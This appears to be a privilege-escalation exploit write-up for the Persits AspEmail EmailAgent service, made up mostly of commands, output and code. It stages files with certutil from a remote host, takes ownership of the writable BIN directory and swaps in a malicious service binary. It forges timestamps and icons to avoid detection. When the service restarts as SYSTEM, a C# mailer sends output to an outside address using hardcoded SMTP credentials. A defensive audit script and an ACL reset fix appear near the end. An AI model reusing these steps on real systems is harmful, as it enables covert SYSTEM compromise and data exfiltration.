[+] C:\PenTest>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
* First, we test whether the AspEmail service is active.
* Using a normal user account, we list the running processes and check whether the service's process is present:
[+] C:\PenTest>tasklist /svc | findstr EmailAgent.exe
EmailAgent.exe                4400 Persits Software EmailAgent
or
[+] C:\PenTest>tasklist /svc | findstr EmailAgent64.exe
EmailAgent64.exe              4400 Persits Software EmailAgent
* The process of the "Persits Software EmailAgent" service is in the RUNNING state.
* So we know the AspEmail service is active.
* We will need these:
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/EmailAgent.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgentPrivESC.exe" <<<=== MyExploit
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/nircmd.exe "C:\Program Files (x86)\Persits Software\AspEmail\BIN\nircmd.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Mail.exe "C:\Windows\Temp\Mail.exe"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/Run.exe "C:\Windows\Temp\Run.bat"
[+] C:\PenTest>certutil -urlcache -split -f http://10.1.11.21/PrivescCheck.ps1 "C:\PenTest\PrivescCheck.ps1"
[+] C:\PenTest>powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
Name              : Persits Software EmailAgent
ImagePath         : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
User              : LocalSystem
ModifiablePath    : C:\Program Files (x86)\Persits Software\AspEmail\BIN
IdentityReference : Everyone
Permissions       : WriteOwner, Delete, WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory,
                    AppendData/AddSubdirectory, WriteExtendedAttributes, WriteDAC, ReadAttributes, WriteData/AddFile,
                    ReadExtendedAttributes, DeleteChild, Execute/Traverse
Status            : Unknown
UserCanStart      : False
UserCanStop       : False
[+] C:\PenTest>del PrivescCheck.ps1
* Our checks flagged a "Binary Permission Vulnerability" in the "Persits Software EmailAgent" service: the directory holding the service binary is writable by Everyone.
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail: Access is denied.
* We do not have permission to access subdirectories.
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                     DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm:(I)(OI)(CI)(N)
                                                     DeepSecLab\psaadm_users:(I)(OI)(CI)(N)
                                                     BUILTIN\Administrators:(I)(F)
                                                     CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(RX)
                                                     NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                     NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                     BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(I)(OI)(CI)(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(RX)
* Unlike the other directories, we have full control (F) over the service's "BIN" directory, granted to Everyone and inherited by its contents.
* In Linux terms, this is chmod 0777 (rwxrwxrwx).
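The check PrivescCheck performed above, written out as an added PowerShell example (this is not code from this advisory or from PrivescCheck): it walks every auto-start LocalSystem service, tests whether a low-privileged principal holds write-type rights on the directory containing the service binary, and reports the binary's Authenticode status. It assumes an elevated Windows PowerShell 5.1 prompt; the function and variable names are my own.

```powershell
# Added defender check, not code from this advisory or from PrivescCheck: find every
# auto-start service running as LocalSystem whose binary directory grants write-type
# rights to a low-privileged principal, and report the binary's Authenticode status.
# Run from an elevated Windows PowerShell 5.1 prompt. All names here are assumptions.

$LowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users',
             'NT AUTHORITY\INTERACTIVE')
# Rights that let a user swap the binary or rewrite the ACL, as Everyone:(F) did here
$WriteMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete, DeleteSubdirectoriesAndFiles, WriteDacl, TakeOwnership'

function Get-ServiceBinaryPath([string]$PathName) {
    # Strip arguments such as "/run"; handle quoted and unquoted image paths
    # (an unquoted path containing spaces is a separate weakness and is truncated here)
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($PathName -split '\s+')[0]
}

function Find-WritableServiceBinaryDir {
    Get-CimInstance Win32_Service |
      Where-Object { $_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' } |
      ForEach-Object {
        $svc = $_
        $exe = Get-ServiceBinaryPath $svc.PathName
        $dir = Split-Path -Parent $exe
        if (-not $dir -or -not (Test-Path -LiteralPath $dir)) { return }
        $acl  = Get-Acl -LiteralPath $dir
        # Allow ACEs for a low-privileged identity that include any write-type right
        $weak = $acl.Access | Where-Object {
            $_.AccessControlType -eq 'Allow' -and
            $LowPriv -contains $_.IdentityReference.Value -and
            (([int]$_.FileSystemRights) -band $WriteMask) -ne 0
        }
        if ($weak) {
            [pscustomobject]@{
                Service   = $svc.Name
                Binary    = $exe
                Directory = $dir
                Owner     = $acl.Owner
                WeakACE   = ($weak | ForEach-Object {
                                "$($_.IdentityReference): $($_.FileSystemRights)" }) -join '; '
                # An unsigned or tampered binary in a flagged directory deserves a closer look
                Signature = (Get-AuthenticodeSignature -FilePath $exe).Status
            }
        }
      }
}

Find-WritableServiceBinaryDir | Format-List
```

Directories this reports are the ones to reset to their inherited defaults (icacls /RESET, as done at the end of this advisory) and to review for unexpected owners or replaced binaries.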
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-32-544"
(Win32_SID: AccountName=Administrators, ReferencedDomainName=BUILTIN, SID=S-1-5-32-544)
[EmailAgent.exe] ===>>> Owner: BUILTIN\Administrators
* This tells us that "EmailAgent.exe" was installed by an administrator and is owned by BUILTIN\Administrators.
* Next we take ownership of the "BIN" directory, since that is where we will carry out our operations.
[+] C:\PenTest>whoami
DeepSecLab\Hacker
[+] C:\PenTest>takeown /f "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
SUCCESS: The file (or folder): "C:\Program Files (x86)\Persits Software\AspEmail\BIN" now owned by user "DeepSecLab\Hacker".
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /Grant DeepSecLab\Hacker:F
processed file: C:\Program Files (x86)\Persits Software\AspEmail\BIN
Successfully processed 1 files; Failed processing 0 files
* All commands succeeded. We now have full control of this directory.
* Now we replace the EmailAgent binary with our own executable.
* We take care not to damage any existing files, so that every step can be undone easily.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgent.exe Null.EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
13.04.2023  22:00            12.288 EmailAgent.exe   <<<=== renamed from EmailAgentPrivESC.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free
* Next we set the replacement file's creation, last-modified and last-accessed timestamps to match the original.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* Next we extract the icon from the real EmailAgent.exe and apply it to the replacement binary, so that it is harder to spot.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
 Volume in drive C has no label.
 Volume Serial Number is 0C8A-5291

 Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin

14.04.2023  16:47    <DIR>          .
14.04.2023  16:47    <DIR>          ..
01.03.2004  15:55           143.360 AspEmail.dll
25.02.2004  16:23           188.416 AspUpload.dll
24.09.2003  09:21            12.288 EmailAgent.exe
24.09.2003  09:22           139.264 EmailAgentCfg.cpl
24.09.2003  09:25            94.208 EmailLogger.dll
24.09.2003  09:21           167.936 Null.EmailAgent.exe
               6 File(s)        745.472 bytes
               2 Dir(s)  165.936.717.824 bytes free

[24.09.2003 09:21]    12.288 EmailAgent.exe
[24.09.2003 09:21]   167.936 Null.EmailAgent.exe
* The timestamp manipulation is done: both files now appear to have been written at the same time, long ago.
* Now we check the owner of the replaced binary.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511"
(Win32_SID: AccountName=Hacker, ReferencedDomainName=DeepSecLab, SID=S-1-5-21-3674093405-176013069-2091862131-1511)
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
[EmailAgent.exe] ===>>> Owner: DeepSecLab\Hacker
* The replacement binary is built so that when the server reboots (that is, when the services restart),
* it is triggered and runs the commands we choose,
* and then mails the captured output to the address we specified.
// EmailAgentPrivESC.exe: entry point of the replacement service binary. It runs the
// mailer and the batch file below through the author's Cli helper class, whose source
// is not included in this advisory.
using System;
using System.Linq;
using System.Text;
using System.Diagnostics;
using System.IO;
using System.Collections;

namespace CliToolSpace
{
    class _Main
    {
        static void Main(string[] args)
        {
            Cli commandLine = new Cli();
            // Command string in cmd.exe syntax: run the mailer, then the cleanup batch file
            commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat");
            commandLine.Execute();
            // Write the captured output next to the other staged files
            commandLine.ToFile(@"C:\Windows\Temp\");
        }
    }
}
// Mail.exe: sends the trigger notification with Export.txt attached (C# top-level
// statements). The SMTP host, sender, recipient and credentials are the lab's values.
using System;
using System.Net;
using System.Net.Mail;

SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com");
var mail = new MailMessage();
mail.From = new MailAddress("mail@deepseclab.com");
mail.To.Add("mail@hacker.com");
mail.Subject = "Trigger Successful!";
mail.IsBodyHtml = true;
string htmlBody = "<strong>This server has been rebooted.</strong>";
mail.Body = htmlBody;
// Attach the whoami output written by Run.bat
Attachment attachment = new Attachment(@"C:\Windows\Temp\Export.txt");
mail.Attachments.Add(attachment);
SmtpServer.Port = 587;
SmtpServer.UseDefaultCredentials = false;   // must be set before Credentials
SmtpServer.Credentials = new NetworkCredential("mail@deepseclab.com", "p@ssw0rd123");
SmtpServer.EnableSsl = true;                // STARTTLS on port 587
SmtpServer.Timeout = int.MaxValue;
SmtpServer.Send(mail);
REM Run.bat: executed by the replacement binary at service start, as SYSTEM
whoami > C:\Windows\Temp\Export.txt
REM Put the original service binary back
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe
REM Remove the staged files from C:\Windows\Temp, where they were downloaded
cd C:\Windows\Temp
del Run.bat & del Mail.exe
[+] Trigger Successful! [+]
[+] C:\PenTest>systeminfo | findstr "Boot Time"
System Boot Time:          13.04.2022, 07:46:06
* Contents of the attached Export.txt:
NT AUTHORITY\SYSTEM
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Persits Software EmailAgent
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Persits Software EmailAgent
        DEPENDENCIES       : rpcss
        SERVICE_START_NAME : LocalSystem
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

Persits Software EmailAgent
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
* The service object itself is locked down: only SYSTEM and Administrators can change or control it. The weakness is in the BIN directory ACL, not in the service configuration.
* Fix: as administrator, reset the ACLs on the whole "Persits Software" tree to their inherited defaults, then confirm from the low-privileged account that BIN is no longer accessible.
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. They are used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability, and I don't think it's necessary anymore.